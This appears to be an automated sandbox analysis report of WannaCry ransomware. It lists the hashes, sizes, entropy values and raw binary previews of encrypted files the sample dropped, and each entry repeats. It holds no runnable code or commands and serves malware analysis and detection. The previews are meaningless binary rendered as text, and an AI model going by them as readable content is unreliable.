                                                                              Preview:WANACRY!.......cV. ..`..y).H=:.....j...\...#kog. .1..-..0..A.'v.W[....)M..5..?.v....f........sl.FV.LL.o5qzN.+.+..k`L.z4...P.`.+.....Q.@[...7.V....{.l..-...0.).eg...*D.].........<......4YR.<...^..P.8*....e.7...............b.@.*...r...2. ...j::Q..qn....(...................V|.^TFiZ....\......_||Wy.....7.3.........}@X.B,...R@..+..w.,.g.j$Lx...L.3...T...H......y+.?...y..Q.!..A6.....8m..k.kbY[..4...h..Eh7..RjD..=t3L/......7G...J$K.d7P?>`.I......T1ww..s..h..w3....m ..9Bb.~...b.y......$.D..c.....m.._:0|.~...O+....{......[..?......-........*.O.......x.gP..Oy.........-.pY..8.c.H..d..3...}..X....FO..a.P.).!DD.P%`.}T.-/....w..........uH.ql;.#t}.D.....v..>.{..G..!]'...96..4.I.C...\.O.%..C.1n,.E.i..]p.+.&....W........3XP$.=:.uA....^....n..$....K^@....l....P......S....%L$.S.e(HC.H.....2..hE........jc...wgM"...6.....P....k.W60.....qo..\.^.,C..)...Rr]...2I......M....R\.X#b...'|9...T,d...<6AA.....6.c7......*.C.69.\G.. )NA.b'..3._jH.yW..-.=aZ4.......y.....?..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2937064
                                                                              Entropy (8bit):7.999936592582976
                                                                              Encrypted:true
                                                                              SSDEEP:49152:l31gLQ5KtbmseJZkT+EvTtn6Peu2rPZ9PEMlImHXnR7R5NRGbLtT:N1gL9tasoZSvTtfuUZGMnnRTYT
                                                                              MD5:17CB1FC1D64DB4D7B49BF6D39818EFD4
                                                                              SHA1:41FF688073F59B3367EC44942A83F7FD0FB8BCA5
                                                                              SHA-256:031010FC6A8BA738A2A77E28A08BD73F3186D92E8D8E82FBDDC55397B3D4CC29
                                                                              SHA-512:F09CFD6B313FCB3F725447D26E1D39F3F80931E1D3B0EECC19A4A394B124FE2A8CF82EC24190286A1EEDD27C6B91FED1DC8F9B6E0C5827AFD6877F461D723C30
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......EtQ...0[....|3k...).8.'.....8.9.P.....?..y.....>wE.q..4.:b..d...c.]..`h......&a_.+.0L. ..$.dn%zy.r3.A...~...S....k..h#......."...s.M............E.JUv...z..R......W..=.c...L.../:..a....(w.}..?...\3..u...L.q..W'.D.L..q$..7...=6u8{...."..e{.cVG#.{......,.....{b...1.....m...).N...E.xd.X..V.6..>./M...C...k..B...u..7G.UiMw9.....=..-...x.m{)%.K.`.%.....Y#...ti.{..Ay........c2....."F.Pr.O..-...f.\.]..............Q..'.1P.+....C..+...d.G.G.d$J1;....Q...&= ...G...3D5..M...*X..-n..`.....O.o*G.......>.O.@..:~.1..(.+;..lj......(.,..yJ+4n.(.y.'.29....SVxR...i..6.QWi.7......<Y...Z'6...Q..;AS,..H...%.&..S.<,B}i.{.......$.....e5v.U..($.#bh..P6...p.[`....U.+.x...E....f.M.........?:...Y0...1...W....-....P..i-Q..@1..=r.P....KV9>.v....1gCB...*l..Hs..\.S../....KQ...za...$..Z.. ...OG.......(q.*p9`..R$..w.N..nV..m.j;5...3I..%...$.A.S..1p.E..{..Z.Q.i.r.4cpE..?~...._\.iP%.{...b..\N.>...v..>....:.>..A..y.+]8.~(......U7Ic.$.I.z...!.<.5N7.q....Y1q.]...... ...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2937064
                                                                              Entropy (8bit):7.999936592582976
                                                                              Encrypted:true
                                                                              SSDEEP:49152:l31gLQ5KtbmseJZkT+EvTtn6Peu2rPZ9PEMlImHXnR7R5NRGbLtT:N1gL9tasoZSvTtfuUZGMnnRTYT
                                                                              MD5:17CB1FC1D64DB4D7B49BF6D39818EFD4
                                                                              SHA1:41FF688073F59B3367EC44942A83F7FD0FB8BCA5
                                                                              SHA-256:031010FC6A8BA738A2A77E28A08BD73F3186D92E8D8E82FBDDC55397B3D4CC29
                                                                              SHA-512:F09CFD6B313FCB3F725447D26E1D39F3F80931E1D3B0EECC19A4A394B124FE2A8CF82EC24190286A1EEDD27C6B91FED1DC8F9B6E0C5827AFD6877F461D723C30
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......EtQ...0[....|3k...).8.'.....8.9.P.....?..y.....>wE.q..4.:b..d...c.]..`h......&a_.+.0L. ..$.dn%zy.r3.A...~...S....k..h#......."...s.M............E.JUv...z..R......W..=.c...L.../:..a....(w.}..?...\3..u...L.q..W'.D.L..q$..7...=6u8{...."..e{.cVG#.{......,.....{b...1.....m...).N...E.xd.X..V.6..>./M...C...k..B...u..7G.UiMw9.....=..-...x.m{)%.K.`.%.....Y#...ti.{..Ay........c2....."F.Pr.O..-...f.\.]..............Q..'.1P.+....C..+...d.G.G.d$J1;....Q...&= ...G...3D5..M...*X..-n..`.....O.o*G.......>.O.@..:~.1..(.+;..lj......(.,..yJ+4n.(.y.'.29....SVxR...i..6.QWi.7......<Y...Z'6...Q..;AS,..H...%.&..S.<,B}i.{.......$.....e5v.U..($.#bh..P6...p.[`....U.+.x...E....f.M.........?:...Y0...1...W....-....P..i-Q..@1..=r.P....KV9>.v....1gCB...*l..Hs..\.S../....KQ...za...$..Z.. ...OG.......(q.*p9`..R$..w.N..nV..m.j;5...3I..%...$.A.S..1p.E..{..Z.Q.i.r.4cpE..?~...._\.iP%.{...b..\N.>...v..>....:.>..A..y.+]8.~(......U7Ic.$.I.z...!.<.5N7.q....Y1q.]...... ...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1160
                                                                              Entropy (8bit):7.836035419617839
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC8s3RL9XynlIei2xhz0FCfGgZshfnQr6D0bwY76F5yJus6:bkC/RpclIWNfGgWRAm0szF5yur
                                                                              MD5:881A8BD13D8CE9F932AF38E561ADF727
                                                                              SHA1:96C870627ED38F2FA461CAAE65081879763D0527
                                                                              SHA-256:D6EE34BC77BA2FB9F8845033E6F824BD5D74C98B78198A750D85570A1B943F9B
                                                                              SHA-512:763EAA3CFE57BDD76AA8A3F679F5A861BAA556388981F9C8FEE7EF322CCCCA4CABCAD418FF167BD0EE22E15CCF0571373F357C1C9091023BFE073D87F12AFEB0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....N........o>.f.?~L...JoSg..Q.......<wY.-.d.c...,b/+V@...4......H....lB...j`#6.V3..50.\..D.kU8.-G.{.j......(...................lrY.vE..4..Z.*.."gW@......Q..5Qq+.Zs.z...b.....Xv%....%.q.UA.(-.&..4Cg.s2.m>......h`...?a..#9*.g."..Y|A......o.'.....a............){.......F..=...G.8.........i.6.OtZ.g.bz.[Im...T.I0...B.>op2}.,.....;...M..C.EM.KEY....B.....C....GXv.e..8...b.Y..&L.M.......K).."...M`..<..WE-.!........gN...*,w*..UcC....u'.]..[t..{....Y.l..d..3N......w....X.Z...b.......!).......P.V..j._'!..."..1.r.w..2$q.)....>k..J}.p...7?..z.Ak6 Ca.1T3WEjjdd..+U.h..;...+.6.B...y\..^....F."..T..8...?>W...*..l3......e..'...LX.9H....H....,.{b..$....c....=.7..]2...jH..]M7.)a.....6h......9Wd.......n..#&!.t.2a.k...H\L.>...P..y..rM.. .s=.....I...S.r.|..-W.......m..P..\.F.+.|4..@x.~.....!..W-}.....X.}.l-....~X....("k*.2.O.'.....l.mz...;.gH.r........X........\7................Y.....0........:.+^..f?:p ..C.D.NP.w.+.I.[.....6;......1...XI.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1160
                                                                              Entropy (8bit):7.836035419617839
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC8s3RL9XynlIei2xhz0FCfGgZshfnQr6D0bwY76F5yJus6:bkC/RpclIWNfGgWRAm0szF5yur
                                                                              MD5:881A8BD13D8CE9F932AF38E561ADF727
                                                                              SHA1:96C870627ED38F2FA461CAAE65081879763D0527
                                                                              SHA-256:D6EE34BC77BA2FB9F8845033E6F824BD5D74C98B78198A750D85570A1B943F9B
                                                                              SHA-512:763EAA3CFE57BDD76AA8A3F679F5A861BAA556388981F9C8FEE7EF322CCCCA4CABCAD418FF167BD0EE22E15CCF0571373F357C1C9091023BFE073D87F12AFEB0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....N........o>.f.?~L...JoSg..Q.......<wY.-.d.c...,b/+V@...4......H....lB...j`#6.V3..50.\..D.kU8.-G.{.j......(...................lrY.vE..4..Z.*.."gW@......Q..5Qq+.Zs.z...b.....Xv%....%.q.UA.(-.&..4Cg.s2.m>......h`...?a..#9*.g."..Y|A......o.'.....a............){.......F..=...G.8.........i.6.OtZ.g.bz.[Im...T.I0...B.>op2}.,.....;...M..C.EM.KEY....B.....C....GXv.e..8...b.Y..&L.M.......K).."...M`..<..WE-.!........gN...*,w*..UcC....u'.]..[t..{....Y.l..d..3N......w....X.Z...b.......!).......P.V..j._'!..."..1.r.w..2$q.)....>k..J}.p...7?..z.Ak6 Ca.1T3WEjjdd..+U.h..;...+.6.B...y\..^....F."..T..8...?>W...*..l3......e..'...LX.9H....H....,.{b..$....c....=.7..]2...jH..]M7.)a.....6h......9Wd.......n..#&!.t.2a.k...H\L.>...P..y..rM.. .s=.....I...S.r.|..-W.......m..P..\.F.+.|4..@x.~.....!..W-}.....X.}.l-....~X....("k*.2.O.'.....l.mz...;.gH.r........X........\7................Y.....0........:.+^..f?:p ..C.D.NP.w.+.I.[.....6;......1...XI.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2600
                                                                              Entropy (8bit):7.914419355321743
                                                                              Encrypted:false
                                                                              SSDEEP:48:bke0x6COAOhuP4u9q0t+2oTEafjVKszTYs/XbaQwR9hShlz42NV+Vb0x:oZxZvgNTVLEs/YsTwR9eJ42/+y
                                                                              MD5:E1104AAF1A31C40E90E152C8E1E4502D
                                                                              SHA1:8EC7363F618D72108D4E50E6290C76867D9AD05D
                                                                              SHA-256:82D6B93D2E15A00096DA79D6EBEEB91E0E8D098A67002DDDACB220CD53F99FC1
                                                                              SHA-512:BD52D76126468F4180B1D2D63EC429249AA9A73BEA91EBA2453FEF0000F95A20DA08E6471036A4F1196D0EFA1436AE73E3F8BFCF4817AA3DE75CDA6504C34EBB
                                                                              Malicious:false
                                                                              Preview:WANACRY!......./.4......1..0K.z.H.....Z.>&.Nt-9..Q......L0..S.jr...O.i....Y...Y..>.k.|.....&C.qY.ND.q...&..x.....-.,+......-.j&C.../..=ia.o..j.?.(......sE.....9...T...6...m.....~+.)....W.w.g.H...-.._....69U..BU.(.`.nY.".x./X..;..E.u...u.g.w=..`@*.j..)...............i.KP.;..wB...!..p\.oz...........rY....2..=.m..,.v......K2.2..%....\.U1..u..|..@I..3ld..$.!..N..z.N..>.A.A..2..G5=;... Rzb.....&.P.?...c.K"...].;.@..b.x....V.1..8..,...mS...o.5i)..4.z...9.F@......}.Is....Q..s..........M...;x..$j6.+~.......o..vk#2.;6.u...!....-_...}.q{.. .V.#X ..>.3L.ToAW...{r..SE.B..\.U..U.eUY...O...n..|..Q..X....w=.E.JA9!L...$.b9...}...G)i...0}......-...._G..;...)B.32..D.....s.a..Mb..:.2.L....&h;.F$.......W.....Z.(*..Wf1....P..]../>.z..........c...k4dY....E....X.......x[.(...m......=.g.....f.7.......=.W....y..Y.Gqt*b....+.7[._.U.....W..ktJ.dt...G..-..os..z@..#..3.I.^.96c.C....W,..X...).\...|..f..[...~....s....6.......`S.2...&KB..z....5F...l...1..... .k).U
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2600
                                                                              Entropy (8bit):7.914419355321743
                                                                              Encrypted:false
                                                                              SSDEEP:48:bke0x6COAOhuP4u9q0t+2oTEafjVKszTYs/XbaQwR9hShlz42NV+Vb0x:oZxZvgNTVLEs/YsTwR9eJ42/+y
                                                                              MD5:E1104AAF1A31C40E90E152C8E1E4502D
                                                                              SHA1:8EC7363F618D72108D4E50E6290C76867D9AD05D
                                                                              SHA-256:82D6B93D2E15A00096DA79D6EBEEB91E0E8D098A67002DDDACB220CD53F99FC1
                                                                              SHA-512:BD52D76126468F4180B1D2D63EC429249AA9A73BEA91EBA2453FEF0000F95A20DA08E6471036A4F1196D0EFA1436AE73E3F8BFCF4817AA3DE75CDA6504C34EBB
                                                                              Malicious:false
                                                                              Preview:WANACRY!......./.4......1..0K.z.H.....Z.>&.Nt-9..Q......L0..S.jr...O.i....Y...Y..>.k.|.....&C.qY.ND.q...&..x.....-.,+......-.j&C.../..=ia.o..j.?.(......sE.....9...T...6...m.....~+.)....W.w.g.H...-.._....69U..BU.(.`.nY.".x./X..;..E.u...u.g.w=..`@*.j..)...............i.KP.;..wB...!..p\.oz...........rY....2..=.m..,.v......K2.2..%....\.U1..u..|..@I..3ld..$.!..N..z.N..>.A.A..2..G5=;... Rzb.....&.P.?...c.K"...].;.@..b.x....V.1..8..,...mS...o.5i)..4.z...9.F@......}.Is....Q..s..........M...;x..$j6.+~.......o..vk#2.;6.u...!....-_...}.q{.. .V.#X ..>.3L.ToAW...{r..SE.B..\.U..U.eUY...O...n..|..Q..X....w=.E.JA9!L...$.b9...}...G)i...0}......-...._G..;...)B.32..D.....s.a..Mb..:.2.L....&h;.F$.......W.....Z.(*..Wf1....P..]../>.z..........c...k4dY....E....X.......x[.(...m......=.g.....f.7.......=.W....y..Y.Gqt*b....+.7[._.U.....W..ktJ.dt...G..-..os..z@..#..3.I.^.96c.C....W,..X...).\...|..f..[...~....s....6.......`S.2...&KB..z....5F...l...1..... .k).U
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6856
                                                                              Entropy (8bit):7.971702707528781
                                                                              Encrypted:false
                                                                              SSDEEP:192:l/HRi4sSBM7Idb7EFb8x/jvMOcoJR3W3JoOO6Hilct:xRkU57ENu/jTfH32J06Hpt
                                                                              MD5:BE15E60ABDC3CBF86E38CF3BEDFD6406
                                                                              SHA1:916A830A00DC716A560D6EF7F13E806EA71E928A
                                                                              SHA-256:DA40EE4196612852BB690D8E095EDF4F51A7E57EDD13C9F7666F4823B3C94502
                                                                              SHA-512:BC3104E32B523022AD8AC6D93A0641BE88C3E808FD08CF1C49857DDF030124DABAB0B337EE401002E3894CE574AF20CE10BE7D79C9D60BE9072C6E4B39D7AE6A
                                                                              Malicious:false
                                                                              Preview:WANACRY!......X.Y.7..._.Z.....lD...Nh~9...(..}R..(....:.[..t.E$..q...9.g....b.QY%.QB..........u....,.FJWKW........3.F>2..r.vF.ryX.jU9..'... .w.PV.)..\...LN:E.|.}.Q.h.$he..WE.~..D..aw.W....E..`....B..mC....?....J...7E..%.......;.C.l..E..K..re.Oh]..+*............Q.....6qj5.'ye...z...d...,R.A.^...B..A'....#.M...p.^.d...?4.5...^......K..{MG(....A..7.N...op...Rq..\..............<..>.....v'...]...F.........ru.e...Md^.....5pRG,;.I.B.k..QV.......I..nL:_....{N.......vb}.e....R........Z....-.....w jKO.F.#(.....8..V... S.muN.R..".Q.D....V.W.?I...aD..'..zW..M..x|..H.J"...m@2.d........,z..)t.b...Q......Z.#......V].Wme..H..H..|..C....C.'..TZG....|t,..*A..u..g....l...u;.l..G....T.......d|...K..+.A1..$GW..#>.6j#:....gX...m..a@w....Ft.T...}..^..,U...U...W.Y_..|..T[k.|.......d.8n........fh.h.=..?....,xr.....3..K.2.>5X/...z.0'..7.K#z..j~i.`..~._..'.0..........Q..R....Y0.~.Z...O.c.<l.....d.)..a.W+20.QX..QH..j...#k/{....8...q-...125{Y.L.)>.j.d.CYew
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6856
                                                                              Entropy (8bit):7.971702707528781
                                                                              Encrypted:false
                                                                              SSDEEP:192:l/HRi4sSBM7Idb7EFb8x/jvMOcoJR3W3JoOO6Hilct:xRkU57ENu/jTfH32J06Hpt
                                                                              MD5:BE15E60ABDC3CBF86E38CF3BEDFD6406
                                                                              SHA1:916A830A00DC716A560D6EF7F13E806EA71E928A
                                                                              SHA-256:DA40EE4196612852BB690D8E095EDF4F51A7E57EDD13C9F7666F4823B3C94502
                                                                              SHA-512:BC3104E32B523022AD8AC6D93A0641BE88C3E808FD08CF1C49857DDF030124DABAB0B337EE401002E3894CE574AF20CE10BE7D79C9D60BE9072C6E4B39D7AE6A
                                                                              Malicious:false
                                                                              Preview:WANACRY!......X.Y.7..._.Z.....lD...Nh~9...(..}R..(....:.[..t.E$..q...9.g....b.QY%.QB..........u....,.FJWKW........3.F>2..r.vF.ryX.jU9..'... .w.PV.)..\...LN:E.|.}.Q.h.$he..WE.~..D..aw.W....E..`....B..mC....?....J...7E..%.......;.C.l..E..K..re.Oh]..+*............Q.....6qj5.'ye...z...d...,R.A.^...B..A'....#.M...p.^.d...?4.5...^......K..{MG(....A..7.N...op...Rq..\..............<..>.....v'...]...F.........ru.e...Md^.....5pRG,;.I.B.k..QV.......I..nL:_....{N.......vb}.e....R........Z....-.....w jKO.F.#(.....8..V... S.muN.R..".Q.D....V.W.?I...aD..'..zW..M..x|..H.J"...m@2.d........,z..)t.b...Q......Z.#......V].Wme..H..H..|..C....C.'..TZG....|t,..*A..u..g....l...u;.l..G....T.......d|...K..+.A1..$GW..#>.6j#:....gX...m..a@w....Ft.T...}..^..,U...U...W.Y_..|..T[k.|.......d.8n........fh.h.=..?....,xr.....3..K.2.>5X/...z.0'..7.K#z..j~i.`..~._..'.0..........Q..R....Y0.~.Z...O.c.<l.....d.)..a.W+20.QX..QH..j...#k/{....8...q-...125{Y.L.)>.j.d.CYew
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9032
                                                                              Entropy (8bit):7.9751358056411155
                                                                              Encrypted:false
                                                                              SSDEEP:192:IErKUOAgafdDL8y67XV71O51q+bMo8PxhUOnKLG8zI5W+Ehc4m:INUOjSdP85V0C+bMo0xC+H5DEG
                                                                              MD5:14EE056DBA5653448F28093D09CD5862
                                                                              SHA1:4A18C5CC6B8B785F4302772D339491850E8E6389
                                                                              SHA-256:91CA647C5AFA61820749CBD6513E5C04A405626925CF6C00170D53E6F17AC9B6
                                                                              SHA-512:8D0DF2CA12859CB2E1F0A36E2EEB62E6A76FD78515E9169BE933E214A148CC91F20192ED15517328C85EA451F7B01C1A3E4AB28455CE076802071CEBC29031BD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....t......#..!.5.Vp.,...!.L.......w..1.Y....cR..>ml..~P.,.$*.'.#.K.......l....2A.}..E%.Y...7....,...p....G..,..%..l.FTn....x....,.-..!B7..@... ..O.1..(.9..YwF.l..z..l.......f....{.. ..Ek...X.?.......z..J.n.......?M+OI.o?..0.L@nWI.1......i.........*"......`..2..k......gc..........~hN....<r.9...Y\.._..zH.....m|.>c.R.2..0......%}.v.....^..)..2b...-..........f;._.....v.._C.m....x'.P.C.Wg.u}n$3ch........L@e...I..pL.b.Z.x.#.y..(...<...~.Jo./^.>......7L.2.@.B.z...*...2B..*9l...>...O...m"F......+&.pj....0:n...LS........V.. 4?...O<j.O...."Wo2.#t.sWQ...=.;...7...O...9..`..M_mX.....\.#..S+3..X;\.....ri.R:r'..nr..\..*...8......0..C.J]7.^.....:wm...C..:...!Y..r.RI.CK!.s.gl.C.........:q..g..fu.S.U..J..=..Zv.g.t..=w?.v....Fg.`..e.GT..LB'..6A.RD5r#b.<.R....M#..........].w..R._\b.~..}y1]....Z...>..q...C8.a...R...p....%}.......H.DRa.O.'./V...........k..RUt...0Rb.Y?.D)u^|...`...ww=.`>|cs.K..e&.(!.|.".x7...jCg...u.X...8..NY..)7........4.G...FTw.&.]...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9032
                                                                              Entropy (8bit):7.9751358056411155
                                                                              Encrypted:false
                                                                              SSDEEP:192:IErKUOAgafdDL8y67XV71O51q+bMo8PxhUOnKLG8zI5W+Ehc4m:INUOjSdP85V0C+bMo0xC+H5DEG
                                                                              MD5:14EE056DBA5653448F28093D09CD5862
                                                                              SHA1:4A18C5CC6B8B785F4302772D339491850E8E6389
                                                                              SHA-256:91CA647C5AFA61820749CBD6513E5C04A405626925CF6C00170D53E6F17AC9B6
                                                                              SHA-512:8D0DF2CA12859CB2E1F0A36E2EEB62E6A76FD78515E9169BE933E214A148CC91F20192ED15517328C85EA451F7B01C1A3E4AB28455CE076802071CEBC29031BD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....t......#..!.5.Vp.,...!.L.......w..1.Y....cR..>ml..~P.,.$*.'.#.K.......l....2A.}..E%.Y...7....,...p....G..,..%..l.FTn....x....,.-..!B7..@... ..O.1..(.9..YwF.l..z..l.......f....{.. ..Ek...X.?.......z..J.n.......?M+OI.o?..0.L@nWI.1......i.........*"......`..2..k......gc..........~hN....<r.9...Y\.._..zH.....m|.>c.R.2..0......%}.v.....^..)..2b...-..........f;._.....v.._C.m....x'.P.C.Wg.u}n$3ch........L@e...I..pL.b.Z.x.#.y..(...<...~.Jo./^.>......7L.2.@.B.z...*...2B..*9l...>...O...m"F......+&.pj....0:n...LS........V.. 4?...O<j.O...."Wo2.#t.sWQ...=.;...7...O...9..`..M_mX.....\.#..S+3..X;\.....ri.R:r'..nr..\..*...8......0..C.J]7.^.....:wm...C..:...!Y..r.RI.CK!.s.gl.C.........:q..g..fu.S.U..J..=..Zv.g.t..=w?.v....Fg.`..e.GT..LB'..6A.RD5r#b.<.R....M#..........].w..R._\b.~..}y1]....Z...>..q...C8.a...R...p....%}.......H.DRa.O.'./V...........k..RUt...0Rb.Y?.D)u^|...`...ww=.`>|cs.K..e&.(!.|.".x7...jCg...u.X...8..NY..)7........4.G...FTw.&.]...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7944
                                                                              Entropy (8bit):7.976744545878159
                                                                              Encrypted:false
                                                                              SSDEEP:192:uCQfDM6Hp5u/zKNxjLR9ltPyPhKzIA2qBzGhcri9WYV94w+h:uCQbM6Hp5u7KNj9TPyPhWBzdr4WYD4z
                                                                              MD5:5D4001ED7E71CBA534D8E1FFC06910C9
                                                                              SHA1:ABE1E517E329E857AADCEC389AF027C8F888F77E
                                                                              SHA-256:FAE8322E72497AE416AEB62CBAB1AC02329DE0C470CAF09354F55E8147674D4A
                                                                              SHA-512:3E119AAD8C1B6EF4A34D9DE8974790D529DB5D5D4FC080E63FE8ED8A1616FEC237E7210C4789E5887D76E64E97E6512560E1D58A7951B296265D5F3ED79139F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....6I....R.A|j.3.v\.F?.b..h.,C|T{.D..E....&.#.m.{6..{7....U@n.....@k..H.a.8.Z..v)\w..u...i.3X..3..?..D..C`'o41qj..I.=.. .^.T....=gM.....6.>`...I.d.D.P....f.j\.l.. ...aA.......ZlD.`W.-.Gf&.H....-..O..#zn9....&%.......?.O3....pf.!...]BT..].u..H.C............d.....D....V..|........L{9~.#M..h...@..?...v}..Q.\.3OL...dH..+C..XM.{{:...[[...F..,`.C..)5~@.c^r.....6.....D.kq.j?....8~1;...6A.3v.3.'.F....g.........gt0.i....oO....s.:..b..`.@...._s.../L..4..X...>u.a.."..../%O.,g-..,"Eb..D*......f..H..D....B..;..A^.....&.^mN.CR)Z...... .S3..j<.Q........}a.B.....VEAd. ..Rj...\\.......h..m,....v....P;do/|.l./M..l.C.f.R.Fdd...#....U+.sYn..k...m?.u.sX.Ek..6...'...9....xy........2/5.-RhtT.@......a.&.Bm.F.\TR...l..u..M.T.3G...X..2^m.x.O.y...N5N.....E..>8..%. 5._...6.n.74a.x.xYh...{b........?.KP...O...x.pc..e.P..# 0...D.....k..SU......VF.]:.P.....%.J...i.]...e5Z..Y.'......M.b..*N...!..p.a.+.......q...m.:.<.3aM.Ti.G..^.+k....:.}c..z....M..@"
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7944
                                                                              Entropy (8bit):7.976744545878159
                                                                              Encrypted:false
                                                                              SSDEEP:192:uCQfDM6Hp5u/zKNxjLR9ltPyPhKzIA2qBzGhcri9WYV94w+h:uCQbM6Hp5u7KNj9TPyPhWBzdr4WYD4z
                                                                              MD5:5D4001ED7E71CBA534D8E1FFC06910C9
                                                                              SHA1:ABE1E517E329E857AADCEC389AF027C8F888F77E
                                                                              SHA-256:FAE8322E72497AE416AEB62CBAB1AC02329DE0C470CAF09354F55E8147674D4A
                                                                              SHA-512:3E119AAD8C1B6EF4A34D9DE8974790D529DB5D5D4FC080E63FE8ED8A1616FEC237E7210C4789E5887D76E64E97E6512560E1D58A7951B296265D5F3ED79139F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....6I....R.A|j.3.v\.F?.b..h.,C|T{.D..E....&.#.m.{6..{7....U@n.....@k..H.a.8.Z..v)\w..u...i.3X..3..?..D..C`'o41qj..I.=.. .^.T....=gM.....6.>`...I.d.D.P....f.j\.l.. ...aA.......ZlD.`W.-.Gf&.H....-..O..#zn9....&%.......?.O3....pf.!...]BT..].u..H.C............d.....D....V..|........L{9~.#M..h...@..?...v}..Q.\.3OL...dH..+C..XM.{{:...[[...F..,`.C..)5~@.c^r.....6.....D.kq.j?....8~1;...6A.3v.3.'.F....g.........gt0.i....oO....s.:..b..`.@...._s.../L..4..X...>u.a.."..../%O.,g-..,"Eb..D*......f..H..D....B..;..A^.....&.^mN.CR)Z...... .S3..j<.Q........}a.B.....VEAd. ..Rj...\\.......h..m,....v....P;do/|.l./M..l.C.f.R.Fdd...#....U+.sYn..k...m?.u.sX.Ek..6...'...9....xy........2/5.-RhtT.@......a.&.Bm.F.\TR...l..u..M.T.3G...X..2^m.x.O.y...N5N.....E..>8..%. 5._...6.n.74a.x.xYh...{b........?.KP...O...x.pc..e.P..# 0...D.....k..SU......VF.]:.P.....%.J...i.]...e5Z..Y.'......M.b..*N...!..p.a.+.......q...m.:.<.3aM.Ti.G..^.+k....:.}c..z....M..@"
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7032
                                                                              Entropy (8bit):7.972383103653658
                                                                              Encrypted:false
                                                                              SSDEEP:192:enWRnB8sbKz1qfDXeOMpv3cVlMZoCU/68/vc075La3UqHRjf:X3mzsfDXwhQ+NU/6krNYjT
                                                                              MD5:EA425A28772B9AAD38E0C9E2AC920185
                                                                              SHA1:365CA6A136CB5E9EE455EE0B1ED8D0488A37DEE9
                                                                              SHA-256:96AC3430C8011ED631D547534474F72192F3865AA02C4D49817B76D7AF2D4CB4
                                                                              SHA-512:256EB97E014857A1D4F4CB2E5AB6FA5B4097CF75D1AA4C5545D0F4DB1B6EB6D7410CEF5E131E5551BD941427078001FD4A562458DCBBF6DBB22DA49A04A4B0E6
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....X....u..pu#X..^......<=}<...i..<./..TRE..!....p..H.,...R..wm.Pt..M...=...\(....:..P....P.0c......<.ne5.-....d.g...m5q.......ZD.l....<.........'..7.!...r...9......!]s....y/.N.$/!|?o.R...N.t..b...vbWE3............=.q.{...pQ..5-....`n...._....T.........\...B..I.W:...:.J.....|H...X?......./..M.H..#s...z..x ..)a.%Vnr.vp..l+%Sc.T..e..*C#..:/...k.XZ|H.*.S.#....K...;.N.{..+.U....v&.........P.Sb...Go....IT.s...y.cggT.>X...2o@.H..*=..r];..o. ...&6/.l.)A....1....w.e.d@.L.aI.y..cO.d.>.B4....X...X?.&.d.........."-..L.,.....=.!^............V...<OH......?...B.@..BY.!..K^...5...{|<.7.)0. }..........EY.`'.B...x.v........~c.3..yPy.f.3.8...N....Q..-J.F{..$..D.~q..j..7Z...^.R.+~u...=>.R..%W.$Bx.".../`........W.....sx`..v.U..|Lz{..>T.....)pe.a`........3D.3"3.#.......s:......CN(....q...*.n..+.Z..{..U_7..u..1.q..<B7qf.E.'./1...X.......@.........R.l?k..X3.Jo ....o.CL..(....o?_[..0..n.Y..%.'.....=..i.._.@#.. ...xl.}o...k.....z...?..u.-...~>m
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7032
                                                                              Entropy (8bit):7.972383103653658
                                                                              Encrypted:false
                                                                              SSDEEP:192:enWRnB8sbKz1qfDXeOMpv3cVlMZoCU/68/vc075La3UqHRjf:X3mzsfDXwhQ+NU/6krNYjT
                                                                              MD5:EA425A28772B9AAD38E0C9E2AC920185
                                                                              SHA1:365CA6A136CB5E9EE455EE0B1ED8D0488A37DEE9
                                                                              SHA-256:96AC3430C8011ED631D547534474F72192F3865AA02C4D49817B76D7AF2D4CB4
                                                                              SHA-512:256EB97E014857A1D4F4CB2E5AB6FA5B4097CF75D1AA4C5545D0F4DB1B6EB6D7410CEF5E131E5551BD941427078001FD4A562458DCBBF6DBB22DA49A04A4B0E6
                                                                              Malicious:false
